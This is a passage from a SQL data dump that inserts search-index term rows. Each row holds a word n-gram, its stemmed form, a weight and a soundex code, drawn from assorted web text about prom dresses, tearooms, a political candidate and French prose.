on',0,1,1.4333,'A353235',1,'en'),(47412,'affair','affair',0,0,0.4,'A160',1,'en'),(47413,'affair mainly','affair mainly',0,1,1.4333,'A1654',1,'en'),(47414,'affair mainly tea','affair mainly tea',0,1,1.5667,'A16543',1,'en'),(47415,'afternoon','afternoon',0,0,0.6,'A1365',1,'en'),(47416,'afternoon research','afternoon research',0,1,1.6,'A13656262',1,'en'),(47417,'afternoon research materials','afternoon research materials',0,1,1.9333,'A1365626253642',1,'en'),(47418,'again being','again being',0,1,1.3667,'A25152',1,'en'),(47419,'again being crowned','again being crowned',0,1,1.6333,'A25152653',1,'en'),(47420,'again would','again would',0,1,1.3667,'A2543',1,'en'),(47421,'again would absolutely','again would absolutely',0,1,1.7333,'A254312434',1,'en'),(47422,'all again','all again',0,1,1.3,'A425',1,'en'),(47423,'all again being','all again being',0,1,1.5,'A425152',1,'en'),(47424,'all again would','all again would',0,1,1.5,'A42543',1,'en'),(47425,'already the','alreadi the',0,1,1.3667,'A463',1,'en'),(47426,'already the corner','alreadi the corner',0,1,1.6,'A4632656',1,'en'),(47427,'am excited','am excited',0,1,1.3333,'A523',1,'en'),(47428,'am excited to','am excited to',0,1,1.4333,'A523',1,'en'),(47429,'am having','am having',0,1,1.3,'A5152',1,'en'),(47430,'am having a','am having a',0,1,1.3667,'A5152',1,'en'),(47431,'an honor','an honor',0,1,1.2667,'A560',1,'en'),(47432,'an honor in','an honor in',0,1,1.3667,'A565',1,'en'),(47433,'ancestor','ancestor',0,0,0.5333,'A5236',1,'en'),(47434,'ancestor information','ancestor information',0,1,1.6667,'A5236516535',1,'en'),(47435,'ancestor information donations','ancestor information donations',0,1,2,'A523651653535352',1,'en'),(47436,'and ancestor','and ancestor',0,1,1.4,'A535236',1,'en'),(47437,'and ancestor information','and ancestor information',0,1,1.8,'A535236516535',1,'en'),(47438,'and dresses','and dresses',0,1,1.3667,'A5362',1,'en'),(47439,'and dresses for','and dresses for',0,1,1.5,'A536216',1,'en'),(47440,'and early','and early',0,1,1.3,'A5364',1,'en'),(47441,'and early summer','and early summer',0,1,1.5333,'A5364256',1,'en'),(47442,'and for the','and for the',0,1,1.3667,'A53163',1,'en'),(47443,'and isn\'t','and isn',0,1,1.3,'A53253',1,'en'),(47444,'and isn\'t just','and isn just',0,1,1.4667,'A5325323',1,'en'),(47445,'and june','and june',0,1,1.2667,'A5325',1,'en'),(47446,'and june weddings','and june weddings',0,1,1.5667,'A5325352',1,'en'),(47447,'and late','and late',0,1,1.2667,'A5343',1,'en'),(47448,'and late spring','and late spring',0,1,1.5,'A534321652',1,'en'),(47449,'and navy','and navy',0,1,1.2667,'A5351',1,'en'),(47450,'and navy blue','and navy blue',0,1,1.4333,'A53514',1,'en'),(47451,'and plain','and plain',0,1,1.3,'A53145',1,'en'),(47452,'and plain biscuits','and plain biscuits',0,1,1.6,'A531451232',1,'en'),(47453,'and providing a','and providing a',0,1,1.5,'A53161352',1,'en'),(47454,'and tea','and tea',0,1,1.2333,'A530',1,'en'),(47455,'and tea urns','and tea urns',0,1,1.4,'A53652',1,'en'),(47456,'and the waitresses','and the waitresses',0,1,1.6,'A5362',1,'en'),(47457,'and understands','and understands',0,1,1.5,'A5353623532',1,'en'),(47458,'and understands how','and understands how',0,1,1.6333,'A5353623532',1,'en'),(47459,'and white frilly','and white frilly',0,1,1.5333,'A53164',1,'en'),(47460,'angeles feb.5','angel feb.5',0,1,1.4333,'A52421',1,'en'),(47461,'angeles feb.5 2013','angel feb.5 2013',0,1,1.6,'A52421',1,'en'),(47462,'another career','anoth career',0,1,1.4667,'A53626',1,'en'),(47463,'another career politician','anoth career politician',0,1,1.8333,'A5362614325',1,'en'),(47464,'aprons','apron',0,0,0.4,'A1652',1,'en'),(47465,'aprons when','apron when',0,1,1.3667,'A16525',1,'en'),(47466,'aprons when i','apron when i',0,1,1.4333,'A16525',1,'en'),(47467,'are created','ar created',0,1,1.3667,'A6263',1,'en'),(47468,'are created craig','ar created craig',0,1,1.5667,'A6263262',1,'en'),(47469,'are far','ar far',0,1,1.2333,'A616',1,'en'),(47470,'are far closer','ar far closer',0,1,1.4667,'A6162426',1,'en'),(47471,'are wonderful','ar wonderful',0,1,1.4333,'A653614',1,'en'),(47472,'are wonderful people','ar wonderful people',0,1,1.6667,'A65361414',1,'en'),(47473,'as a role','as a role',0,1,1.3,'A264',1,'en'),(47474,'as once','as once',0,1,1.2333,'A252',1,'en'),(47475,'as once rationing','as once rationing',0,1,1.5667,'A2526352',1,'en'),(47476,'as the starting','as the starting',0,1,1.5,'A23236352',1,'en'),(47477,'at start','at start',0,1,1.2667,'A32363',1,'en'),(47478,'at start of','at start of',0,1,1.3667,'A323631',1,'en'),(47479,'at the moment','at the moment',0,1,1.4333,'A353',1,'en'),(47480,'ate','at',0,0,0.2,'A300',1,'en'),(47481,'ate it','at it',0,1,1.2,'A300',1,'en'),(47482,'ate it had','at it had',0,1,1.3333,'A300',1,'en'),(47483,'aurait','aurait',0,0,0.4,'A630',1,'en'),(47484,'aurait pu','aurait pu',0,1,1.3,'A631',1,'en'),(47485,'aurait pu faire','aurait pu faire',0,1,1.5,'A6316',1,'en'),(47486,'available to','avail to',0,1,1.4,'A14143',1,'en'),(47487,'available to look','avail to look',0,1,1.5667,'A1414342',1,'en'),(47488,'away but','awai but',0,1,1.2667,'A130',1,'en'),(47489,'away but prom','awai but prom',0,1,1.4333,'A13165',1,'en'),(47490,'background and','background and',0,1,1.4667,'B265353',1,'en'),(47491,'background and understands','background and understands',0,1,1.8667,'B26535353623532',1,'en'),(47492,'bad for','bad for',0,1,1.2333,'B316',1,'en'),(47493,'bad for the','bad for the',0,1,1.3667,'B3163',1,'en'),(47494,'baked','bake',0,0,0.3333,'B230',1,'en'),(47495,'baked goods','bake goods',0,1,1.3667,'B23232',1,'en'),(47496,'baked goods and','bake goods and',0,1,1.5,'B2323253',1,'en'),(47497,'balfleet evening','balfleet evening',0,1,1.5333,'B4143152',1,'en'),(47498,'balfleet evening dresses','balfleet evening dresses',0,1,1.8,'B4143152362',1,'en'),(47499,'balfleet well','balfleet well',0,1,1.4333,'B41434',1,'en'),(47500,'balfleet well wenger','balfleet well wenger',0,1,1.6667,'B41434526',1,'en'),(47501,'be 35wks','be 35wks',0,1,1.2667,'B200',1,'en'),(47502,'be 35wks pregnant','be 35wks pregnant',0,1,1.5667,'B216253',1,'en'),(47503,'be a big','be a big',0,1,1.2667,'B200',1,'en'),(47504,'be accepted','be accepted',0,1,1.3667,'B213',1,'en'),(47505,'be accepted los','be accepted los',0,1,1.5,'B21342',1,'en'),(47506,'be available','be available',0,1,1.4,'B414',1,'en'),(47507,'be available to','be available to',0,1,1.5,'B4143',1,'en'),(47508,'beautiful prom','beauti prom',0,1,1.4667,'B314165',1,'en'),(47509,'beautiful prom dresses','beauti prom dresses',0,1,1.7333,'B314165362',1,'en'),(47510,'because he\'s','becaus he',0,1,1.4,'B200',1,'en'),(47511,'because he\'s the','becaus he the',0,1,1.5333,'B230',1,'en'),(47512,'because nobody','becaus nobody',0,1,1.4667,'B2513',1,'en'),(47513,'because nobody at','becaus nobody at',0,1,1.5667,'B2513',1,'en'),(47514,'being crowned','be crowned',0,1,1.4333,'B52653',1,'en'),(47515,'being crowned hall','be crowned hall',0,1,1.6,'B526534',1,'en'),(47516,'big day','big day',0,1,1.2333,'B230',1,'en'),(47517,'big day gets','big day gets',0,1,1.4,'B23232',1,'en'),(47518,'big hole','big hole',0,1,1.2667,'B240',1,'en'),(47519,'big hole that','big hole that',0,1,1.4333,'B243',1,'en'),(47520,'biscuits','biscuit',0,0,0.5333,'B232',1,'en'),(47521,'biscuits there','biscuit there',0,1,1.4667,'B23236',1,'en'),(47522,'biscuits there was','biscuit there was',0,1,1.6,'B232362',1,'en'),(47523,'black dresses','black dresses',0,1,1.4333,'B42362',1,'en'),(47524,'black dresses and','black dresses and',0,1,1.5667,'B4236253',1,'en'),(47525,'blue military','blue military',0,1,1.4333,'B45436',1,'en'),(47526,'blue military demonstrations','blue military demonstrations',0,1,1.9333,'B4543635236352',1,'en'),(47527,'business background','busi background',0,1,1.6333,'B25212653',1,'en'),(47528,'business background and','busi background and',0,1,1.7667,'B2521265353',1,'en'),(47529,'but prom','but prom',0,1,1.2667,'B3165',1,'en'),(47530,'but prom 2013','but prom 2013',0,1,1.4333,'B3165',1,'en'),(47531,'candidate','candid',0,0,0.6,'C530',1,'en'),(47532,'candidate in','candid in',0,1,1.4,'C535',1,'en'),(47533,'candidate in this','candid in this',0,1,1.5667,'C53532',1,'en'),(47534,'career','career',0,0,0.4,'C600',1,'en'),(47535,'career politician','career politician',0,1,1.5667,'C614325',1,'en'),(47536,'career politician there','career politician there',0,1,1.7667,'C61432536',1,'en'),(47537,'chien','chien',0,0,0.3333,'C500',1,'en'),(47538,'chien et','chien et',0,1,1.2667,'C530',1,'en'),(47539,'chien et de','chien et de',0,1,1.3667,'C530',1,'en'),(47540,'civil','civil',0,0,0.3333,'C140',1,'en'),(47541,'civil war','civil war',0,1,1.3,'C146',1,'en'),(47542,'civil war connections','civil war connections',0,1,1.7,'C146252352',1,'en'),(47543,'closer','closer',0,0,0.4,'C426',1,'en'),(47544,'closer than','closer than',0,1,1.3667,'C42635',1,'en'),(47545,'closer than you','closer than you',0,1,1.5,'C42635',1,'en'),(47546,'club','club',0,0,0.2667,'C410',1,'en'),(47547,'club on','club on',0,1,1.2333,'C415',1,'en'),(47548,'club on the','club on the',0,1,1.3667,'C4153',1,'en'),(47549,'coffee as','coffe as',0,1,1.3,'C120',1,'en'),(47550,'coffee as once','coffe as once',0,1,1.4667,'C1252',1,'en'),(47551,'coldest','coldest',0,0,0.4667,'C4323',1,'en'),(47552,'coldest time','coldest time',0,1,1.4,'C43235',1,'en'),(47553,'coldest time of','coldest time of',0,1,1.5,'C432351',1,'en'),(47554,'comes from','come from',0,1,1.3333,'C52165',1,'en'),(47555,'comes from a','come from a',0,1,1.4,'C52165',1,'en'),(47556,'comme','comm',0,0,0.3333,'C500',1,'en'),(47557,'comme jean','comm jean',0,1,1.3333,'C525',1,'en'),(47558,'comme jean gounelle','comm jean gounelle',0,1,1.6333,'C525254',1,'en'),(47559,'compris','compri',0,0,0.4667,'C5162',1,'en'),(47560,'compris le','compri le',0,1,1.3333,'C51624',1,'en'),(47561,'compris le rle','compri le rle',0,1,1.4667,'C5162464',1,'en'),(47562,'connections and','connect and',0,1,1.5,'C5235253',1,'en'),(47563,'connections and ancestor','connect and ancestor',0,1,1.8,'C52352535236',1,'en'),(47564,'corner of','corner of',0,1,1.3,'C6561',1,'en'),(47565,'corner of a','corner of a',0,1,1.3667,'C6561',1,'en'),(47566,'county civil','counti civil',0,1,1.4,'C53214',1,'en'),(47567,'county civil war','counti civil war',0,1,1.5333,'C532146',1,'en'),(47568,'craig','craig',0,0,0.3333,'C620',1,'en'),(47569,'craig because','craig because',0,1,1.4333,'C6212',1,'en'),(47570,'craig because he\'s','craig because he',0,1,1.6,'C6212',1,'en'),(47571,'craig miller','craig miller',0,1,1.4,'C62546',1,'en'),(47572,'craig miller has','craig miller has',0,1,1.5333,'C625462',1,'en'),(47573,'created craig','creat craig',0,1,1.4333,'C63262',1,'en'),(47574,'created craig miller','creat craig miller',0,1,1.6667,'C63262546',1,'en'),(47575,'crowned','crown',0,0,0.4667,'C653',1,'en'),(47576,'crowned hall','crown hall',0,1,1.4,'C6534',1,'en'),(47577,'crowned hall of','crown hall of',0,1,1.5,'C65341',1,'en'),(47578,'customers and','custom and',0,1,1.4333,'C356253',1,'en'),(47579,'customers and for','custom and for',0,1,1.5667,'C35625316',1,'en'),(47580,'d ldedans','d ldedans',0,1,1.3,'D4352',1,'en'),(47581,'d ldedans on','d ldedans on',0,1,1.4,'D43525',1,'en'),(47582,'day gets','dai gets',0,1,1.2667,'D232',1,'en'),(47583,'day gets here','dai gets here',0,1,1.4333,'D2326',1,'en'),(47584,'de la volont','de la volont',0,1,1.4,'D41453',1,'en'),(47585,'de warner','de warner',0,1,1.3,'D656',1,'en'),(47586,'de warner wallace','de warner wallace',0,1,1.5667,'D65642',1,'en'),(47587,'demonstrations','demonstr',0,0,0.9333,'D5236352',1,'en'),(47588,'demonstrations take','demonstr take',0,1,1.6333,'D523635232',1,'en'),(47589,'demonstrations take place','demonstr take place',0,1,1.8333,'D523635232142',1,'en'),(47590,'dining','dine',0,0,0.4,'D520',1,'en'),(47591,'dining club','dine club',0,1,1.3667,'D5241',1,'en'),(47592,'dining club on','dine club on',0,1,1.4667,'D52415',1,'en'),(47593,'do it all','do it all',0,1,1.3,'D400',1,'en'),(47594,'do it because','do it because',0,1,1.4333,'D120',1,'en'),(47595,'do it he','do it he',0,1,1.2667,'D000',1,'en'),(47596,'don\'t know','don know',0,1,1.3333,'D5325',1,'en'),(47597,'don\'t know who\'s','don know who',0,1,1.5333,'D53252',1,'en'),(47598,'don\'t wait','don wait',0,1,1.3333,'D530',1,'en'),(47599,'don\'t wait to','don wait to',0,1,1.4333,'D530',1,'en'),(47600,'donations','donat',0,0,0.6,'D5352',1,'en'),(47601,'donations will','donat will',0,1,1.4667,'D53524',1,'en'),(47602,'donations will be','donat will be',0,1,1.5667,'D535241',1,'en'),(47603,'door to','door to',0,1,1.2333,'D630',1,'en'),(47604,'door to so','door to so',0,1,1.3333,'D632',1,'en'),(47605,'dress balfleet','dress balfleet',0,1,1.4667,'D6214143',1,'en'),(47606,'dress balfleet evening','dress balfleet evening',0,1,1.7333,'D6214143152',1,'en'),(47607,'dress maternity','dress maternity',0,1,1.5,'D6253653',1,'en'),(47608,'dress maternity formal','dress maternity formal',0,1,1.7333,'D62536531654',1,'en'),(47609,'dresses a','dress a',0,1,1.3,'D620',1,'en'),(47610,'dresses a little','dress a little',0,1,1.5333,'D62434',1,'en'),(47611,'dresses and white','dress and white',0,1,1.5667,'D6253',1,'en'),(47612,'dresses for','dress for',0,1,1.3667,'D6216',1,'en'),(47613,'dresses for 2013','dress for 2013',0,1,1.5333,'D6216',1,'en'),(47614,'dresses for weddings','dress for weddings',0,1,1.6667,'D6216352',1,'en'),(47615,'droite','droit',0,0,0.4,'D630',1,'en'),(47616,'droite non','droit non',0,1,1.3333,'D635',1,'en'),(47617,'droite non i','droit non i',0,1,1.4,'D635',1,'en'),(47618,'du chien','du chien',0,1,1.2667,'D250',1,'en'),(47619,'du chien et','du chien et',0,1,1.3667,'D253',1,'en'),(47620,'du tout','du tout',0,1,1.2333,'D000',1,'en'),(47621,'du tout et','du tout et',0,1,1.3333,'D000',1,'en'),(47622,'early summer','earli summer',0,1,1.4,'E64256',1,'en'),(47623,'early summer might','earli summer might',0,1,1.6,'E64256523',1,'en'),(47624,'et comme','et comme',0,1,1.2667,'E325',1,'en'),(47625,'et comme jean','et comme jean',0,1,1.4333,'E32525',1,'en'),(47626,'et de','et de',0,1,1.1667,'E300',1,'en'),(47627,'et de la','et de la',0,1,1.2667,'E340',1,'en'),(47628,'et il','et il',0,1,1.1667,'E340',1,'en'),(47629,'et il me','et il me',0,1,1.2667,'E345',1,'en'),(47630,'even thinking','even thinking',0,1,1.4333,'E1535252',1,'en'),(47631,'even thinking about','even thinking about',0,1,1.6333,'E153525213',1,'en'),(47632,'evening dresses a','even dresses a',0,1,1.5667,'E152362',1,'en'),(47633,'event has','event has',0,1,1.3,'E1532',1,'en'),(47634,'event has opened','event has opened',0,1,1.5333,'E1532153',1,'en'),(47635,'every sense','everi sense',0,1,1.3667,'E16252',1,'en'),(47636,'every sense of','everi sense of',0,1,1.4667,'E162521',1,'en'),(47637,'everyone balfleet','everyon balfleet',0,1,1.5667,'E16514143',1,'en'),(47638,'everyone balfleet well','everyon balfleet well',0,1,1.7333,'E165141434',1,'en'),(47639,'excited to','excit to',0,1,1.3333,'E230',1,'en'),(47640,'excited to support','excit to support',0,1,1.6,'E232163',1,'en'),(47641,'faire','fair',0,0,0.3333,'F600',1,'en'),(47642,'faire jouer','fair jouer',0,1,1.3667,'F626',1,'en'),(47643,'faire jouer valentin','fair jouer valentin',0,1,1.6667,'F62614535',1,'en'),(47644,'fame queen','fame queen',0,1,1.3333,'F525',1,'en'),(47645,'fame queen was','fame queen was',0,1,1.4667,'F5252',1,'en'),(47646,'far closer','far closer',0,1,1.3333,'F62426',1,'en'),(47647,'far closer than','far closer than',0,1,1.5,'F6242635',1,'en'),(47648,'feb.5','feb.5',0,0,0.3333,'F000',1,'en'),(47649,'feb.5 2013','feb.5 2013',0,1,1.3333,'F000',1,'en'),(47650,'feb.5 2013 prnewswire','feb.5 2013 prnewswire',0,1,1.7,'F6526',1,'en'),(47651,'feel bad','feel bad',0,1,1.2667,'F413',1,'en'),(47652,'feel bad for','feel bad for',0,1,1.4,'F41316',1,'en'),(47653,'felipe','felip',0,0,0.4,'F410',1,'en'),(47654,'felipe et','felip et',0,1,1.3,'F413',1,'en'),(47655,'felipe et il','felip et il',0,1,1.4,'F4134',1,'en'),(47656,'fill and','fill and',0,1,1.2667,'F453',1,'en'),(47657,'fill and i','fill and i',0,1,1.3333,'F453',1,'en'),(47658,'find a','find a',0,1,1.2,'F530',1,'en'),(47659,'find a dress','find a dress',0,1,1.4,'F5362',1,'en'),(47660,'find a modest','find a modest',0,1,1.4333,'F535323',1,'en'),(47661,'floor where','floor where',0,1,1.3667,'F460',1,'en'),(47662,'floor where only','floor where only',0,1,1.5333,'F4654',1,'en'),(47663,'floyd','floyd',0,0,0.3333,'F430',1,'en'),(47664,'floyd county','floyd county',0,1,1.4,'F43253',1,'en'),(47665,'floyd county civil','floyd county civil',0,1,1.6,'F43253214',1,'en'),(47666,'for 2013','for 2013',0,1,1.2667,'F600',1,'en'),(47667,'for 2013 and','for 2013 and',0,1,1.4,'F653',1,'en'),(47668,'for craig','for craig',0,1,1.3,'F6262',1,'en'),(47669,'for craig because','for craig because',0,1,1.5667,'F626212',1,'en'),(47670,'for numerous','for numerous',0,1,1.4,'F6562',1,'en'),(47671,'for numerous friendships','for numerous friendships',0,1,1.8,'F65621653212',1,'en'),(47672,'for the customers','for the customers',0,1,1.5667,'F6323562',1,'en'),(47673,'for the help','for the help',0,1,1.4,'F6341',1,'en'),(47674,'for weddings','for weddings',0,1,1.4,'F6352',1,'en'),(47675,'formal','formal',0,0,0.4,'F654',1,'en'),(47676,'formal knee','formal knee',0,1,1.3667,'F65425',1,'en'),(47677,'formal knee length','formal knee length',0,1,1.6,'F654254523',1,'en'),(47678,'formal wear','formal wear',0,1,1.3667,'F6546',1,'en'),(47679,'formal wear is','formal wear is',0,1,1.4667,'F65462',1,'en'),(47680,'fresh baked','fresh baked',0,1,1.3667,'F62123',1,'en'),(47681,'fresh baked goods','fresh baked goods',0,1,1.5667,'F62123232',1,'en'),(47682,'friendships','friendship',0,0,0.7333,'F653212',1,'en'),(47683,'friendships and','friendship and',0,1,1.5,'F65321253',1,'en'),(47684,'friendships and providing','friendship and providing',0,1,1.8333,'F65321253161352',1,'en'),(47685,'frilly','frilli',0,0,0.4,'F640',1,'en'),(47686,'frilly aprons','frilli aprons',0,1,1.4333,'F641652',1,'en'),(47687,'frilly aprons when','frilli aprons when',0,1,1.6,'F6416525',1,'en'),(47688,'from a business','from a business',0,1,1.5,'F651252',1,'en'),(47689,'gets here','get here',0,1,1.3,'G326',1,'en'),(47690,'gets here i','get here i',0,1,1.3667,'G326',1,'en'),(47691,'going to be','go to be',0,1,1.3667,'G5231',1,'en'),(47692,'going to do','go to do',0,1,1.3667,'G523',1,'en'),(47693,'going to have','go to have',0,1,1.4333,'G5231',1,'en'),(47694,'goods and','good and',0,1,1.3,'G3253',1,'en'),(47695,'goods and tea','good and tea',0,1,1.4333,'G3253',1,'en'),(47696,'gounelle','gounel',0,0,0.5333,'G540',1,'en'),(47697,'gounelle j','gounel j',0,1,1.3333,'G542',1,'en'),(47698,'gounelle j pas','gounel j pas',0,1,1.4667,'G54212',1,'en'),(47699,'grade','grade',0,0,0.3333,'G630',1,'en'),(47700,'grade usually','grade usually',0,1,1.4333,'G6324',1,'en'),(47701,'grade usually ate','grade usually ate',0,1,1.5667,'G63243',1,'en'),(47702,'groomed','groom',0,0,0.4667,'G653',1,'en'),(47703,'groomed at','groom at',0,1,1.3333,'G653',1,'en'),(47704,'groomed at start','groom at start',0,1,1.5333,'G6532363',1,'en'),(47705,'had waitress','had waitress',0,1,1.4,'H362',1,'en'),(47706,'had waitress service','had waitress service',0,1,1.6667,'H362612',1,'en'),(47707,'hall of','hall of',0,1,1.2333,'H410',1,'en'),(47708,'hall of fame','hall of fame',0,1,1.4,'H415',1,'en'),(47709,'has a real','ha a real',0,1,1.3333,'H264',1,'en'),(47710,'has opened','ha opened',0,1,1.3333,'H2153',1,'en'),(47711,'has opened the','ha opened the',0,1,1.4667,'H2153',1,'en'),(47712,'have to fill','have to fill',0,1,1.4,'H1314',1,'en'),(47713,'having a','have a',0,1,1.2667,'H152',1,'en'),(47714,'having a heck','have a heck',0,1,1.4333,'H152',1,'en'),(47715,'he said skowhegan','he said skowhegan',0,1,1.5667,'H2325',1,'en'),(47716,'he\'s the','he the',0,1,1.2667,'H230',1,'en'),(47717,'he\'s the only','he the only',0,1,1.4333,'H2354',1,'en'),(47718,'head','head',0,0,0.2667,'H300',1,'en'),(47719,'head straight','head straight',0,1,1.4333,'H323623',1,'en'),(47720,'head straight over','head straight over',0,1,1.6,'H32362316',1,'en'),(47721,'heck','heck',0,0,0.2667,'H200',1,'en'),(47722,'heck of','heck of',0,1,1.2333,'H210',1,'en'),(47723,'heck of a','heck of a',0,1,1.3,'H210',1,'en'),(47724,'help i','help i',0,1,1.2,'H410',1,'en'),(47725,'help i wish','help i wish',0,1,1.3667,'H412',1,'en'),(47726,'her big','her big',0,1,1.2333,'H612',1,'en'),(47727,'her big day','her big day',0,1,1.3667,'H6123',1,'en'),(47728,'here i','here i',0,1,1.2,'H600',1,'en'),(47729,'here i am','here i am',0,1,1.3,'H650',1,'en'),(47730,'higher','higher',0,0,0.4,'H260',1,'en'),(47731,'higher grade','higher grade',0,1,1.4,'H26263',1,'en'),(47732,'higher grade usually','higher grade usually',0,1,1.6667,'H2626324',1,'en'),(47733,'hole','hole',0,0,0.2667,'H400',1,'en'),(47734,'hole that','hole that',0,1,1.3,'H430',1,'en'),(47735,'hole that somebody\'s','hole that somebody',0,1,1.6667,'H4325132',1,'en'),(47736,'honor','honor',0,0,0.3333,'H560',1,'en'),(47737,'honor in','honor in',0,1,1.2667,'H565',1,'en'),(47738,'honor in every','honor in every',0,1,1.4667,'H56516',1,'en'),(47739,'how jobs','how jobs',0,1,1.2667,'H212',1,'en'),(47740,'how jobs are','how jobs are',0,1,1.4,'H2126',1,'en'),(47741,'i am excited','i am excited',0,1,1.4,'I523',1,'en'),(47742,'i am having','i am having',0,1,1.3667,'I5152',1,'en'),(47743,'i don\'t know','i don know',0,1,1.4,'I35325',1,'en'),(47744,'i feel','i feel',0,1,1.2,'I140',1,'en'),(47745,'i feel bad','i feel bad',0,1,1.3333,'I1413',1,'en'),(47746,'i need','i need',0,1,1.2,'I530',1,'en'),(47747,'i need to','i need to',0,1,1.3,'I530',1,'en'),(47748,'i said','i said',0,1,1.2,'I230',1,'en'),(47749,'i said yes','i said yes',0,1,1.3333,'I232',1,'en'),(47750,'i wasn\'t pregnant','i wasn pregnant',0,1,1.5667,'I25316253',1,'en'),(47751,'i wish','i wish',0,1,1.2,'I200',1,'en'),(47752,'i wish everyone','i wish everyone',0,1,1.5,'I2165',1,'en'),(47753,'i\'ll be','i be',0,1,1.2333,'I410',1,'en'),(47754,'i\'ll be 35wks','i be 35wks',0,1,1.4333,'I412',1,'en'),(47755,'i\'m voting','i voting',0,1,1.3333,'I51352',1,'en'),(47756,'i\'m voting for','i voting for',0,1,1.4667,'I5135216',1,'en'),(47757,'il me','il me',0,1,1.1667,'I450',1,'en'),(47758,'il me semble','il me semble',0,1,1.4,'I452514',1,'en'),(47759,'in every sense','in every sense',0,1,1.4667,'I516252',1,'en'),(47760,'in the afternoon','in the afternoon',0,1,1.5333,'I531365',1,'en'),(47761,'in the trolley','in the trolley',0,1,1.4667,'I5364',1,'en'),(47762,'in this race','in this race',0,1,1.4,'I53262',1,'en'),(47763,'information donations','inform donations',0,1,1.7,'I51653535352',1,'en'),(47764,'information donations will','inform donations will',0,1,1.8667,'I516535353524',1,'en'),(47765,'is already','is already',0,1,1.3333,'I2463',1,'en'),(47766,'is already the','is already the',0,1,1.4667,'I2463',1,'en'),(47767,'is set','is set',0,1,1.2,'I230',1,'en'),(47768,'is set up','is set up',0,1,1.3,'I231',1,'en'),(47769,'isn\'t just','isn just',0,1,1.3333,'I25323',1,'en'),(47770,'isn\'t just another','isn just another',0,1,1.6,'I25323536',1,'en'),(47771,'it all','it all',0,1,1.2,'I340',1,'en'),(47772,'it all again','it all again',0,1,1.4,'I3425',1,'en'),(47773,'it because','it because',0,1,1.3333,'I312',1,'en'),(47774,'it because nobody','it because nobody',0,1,1.5667,'I312513',1,'en'),(47775,'it had','it had',0,1,1.2,'I300',1,'en'),(47776,'it had waitress','it had waitress',0,1,1.5,'I362',1,'en'),(47777,'it he said','it he said',0,1,1.3333,'I323',1,'en'),(47778,'it\'s the','it the',0,1,1.2667,'I323',1,'en'),(47779,'it\'s the coldest','it the coldest',0,1,1.5333,'I32324323',1,'en'),(47780,'it\'s tough','it tough',0,1,1.3333,'I3232',1,'en'),(47781,'it\'s tough i','it tough i',0,1,1.4,'I3232',1,'en'),(47782,'j pas','j pas',0,1,1.1667,'J120',1,'en'),(47783,'j pas vraiment','j pas vraiment',0,1,1.4667,'J121653',1,'en'),(47784,'jean gounelle','jean gounelle',0,1,1.4333,'J5254',1,'en'),(47785,'jean gounelle j','jean gounelle j',0,1,1.5,'J52542',1,'en'),(47786,'jobs are','job are',0,1,1.2667,'J126',1,'en'),(47787,'jobs are created','job are created',0,1,1.5333,'J126263',1,'en'),(47788,'jouer','jouer',0,0,0.3333,'J600',1,'en'),(47789,'jouer valentin','jouer valentin',0,1,1.4667,'J614535',1,'en'),(47790,'jouer valentin droite','jouer valentin droite',0,1,1.7,'J614535363',1,'en'),(47791,'jovani','jovani',0,0,0.4,'J150',1,'en'),(47792,'jovani web','jovani web',0,1,1.3333,'J151',1,'en'),(47793,'jovani web site','jovani web site',0,1,1.5,'J15123',1,'en'),(47794,'june weddings','june weddings',0,1,1.4333,'J5352',1,'en'),(47795,'june weddings are','june weddings are',0,1,1.5667,'J53526',1,'en'),(47796,'just another','just another',0,1,1.4,'J3536',1,'en'),(47797,'just another career','just another career',0,1,1.6333,'J353626',1,'en'),(47798,'kicked in the','kick in the',0,1,1.4333,'K353',1,'en'),(47799,'knee length','knee length',0,1,1.3667,'K54523',1,'en'),(47800,'knee length and','knee length and',0,1,1.5,'K5452353',1,'en'),(47801,'know who\'s','know who',0,1,1.3333,'K520',1,'en'),(47802,'know who\'s going','know who going',0,1,1.5333,'K5252',1,'en'),(47803,'knows the','know the',0,1,1.3,'K523',1,'en'),(47804,'knows the meaning','know the meaning',0,1,1.5667,'K52352',1,'en'),(47805,'l du tout','l du tout',0,1,1.3,'L300',1,'en'),(47806,'la volont','la volont',0,1,1.3,'L1453',1,'en'),(47807,'la volont reste','la volont reste',0,1,1.5,'L1453623',1,'en'),(47808,'late spring','late spring',0,1,1.3667,'L321652',1,'en'),(47809,'late spring and','late spring and',0,1,1.5,'L32165253',1,'en'),(47810,'ldedans','ldedan',0,0,0.4667,'L352',1,'en'),(47811,'ldedans on','ldedan on',0,1,1.3333,'L3525',1,'en'),(47812,'ldedans on manque','ldedan on manque',0,1,1.5667,'L35252',1,'en'),(47813,'le rle','le rle',0,1,1.2,'L640',1,'en'),(47814,'le rle de','le rle de',0,1,1.3,'L643',1,'en'),(47815,'lemerand','lemerand',0,0,0.5333,'L5653',1,'en'),(47816,'lemerand said','lemerand said',0,1,1.4333,'L565323',1,'en'),(47817,'lemerand said i\'m','lemerand said i',0,1,1.5667,'L5653235',1,'en'),(47818,'length','length',0,0,0.4,'L523',1,'en'),(47819,'length and','length and',0,1,1.3333,'L52353',1,'en'),(47820,'length and navy','length and navy',0,1,1.5,'L5235351',1,'en'),(47821,'like we','like we',0,1,1.2333,'L200',1,'en'),(47822,'like we were','like we were',0,1,1.4,'L260',1,'en'),(47823,'little more','littl more',0,1,1.3667,'L3456',1,'en'),(47824,'little more formal','littl more formal',0,1,1.6,'L34561654',1,'en'),(47825,'look up','look up',0,1,1.2333,'L210',1,'en'),(47826,'look up floyd','look up floyd',0,1,1.4333,'L2143',1,'en'),(47827,'los angeles feb.5','lo angeles feb.5',0,1,1.5667,'L252421',1,'en'),(47828,'mainly tea','mainli tea',0,1,1.3333,'M430',1,'en'),(47829,'mainly tea and','mainli tea and',0,1,1.4667,'M4353',1,'en'),(47830,'manque','manqu',0,0,0.4,'M200',1,'en'),(47831,'manque felipe','manqu felipe',0,1,1.4333,'M2141',1,'en'),(47832,'manque felipe et','manqu felipe et',0,1,1.5333,'M21413',1,'en'),(47833,'many opportunities','mani opportunities',0,1,1.6,'M163532',1,'en'),(47834,'many opportunities while','mani opportunities while',0,1,1.8,'M1635324',1,'en'),(47835,'market then','market then',0,1,1.3667,'M6235',1,'en'),(47836,'market then add','market then add',0,1,1.5,'M62353',1,'en'),(47837,'materials will','materi will',0,1,1.4667,'M36424',1,'en'),(47838,'materials will be','materi will be',0,1,1.5667,'M364241',1,'en'),(47839,'maternity','matern',0,0,0.6,'M3653',1,'en'),(47840,'maternity formal','matern formal',0,1,1.5333,'M36531654',1,'en'),(47841,'maternity formal wear','matern formal wear',0,1,1.7,'M365316546',1,'en'),(47842,'me semble','me semble',0,1,1.3,'M2514',1,'en'),(47843,'me semble 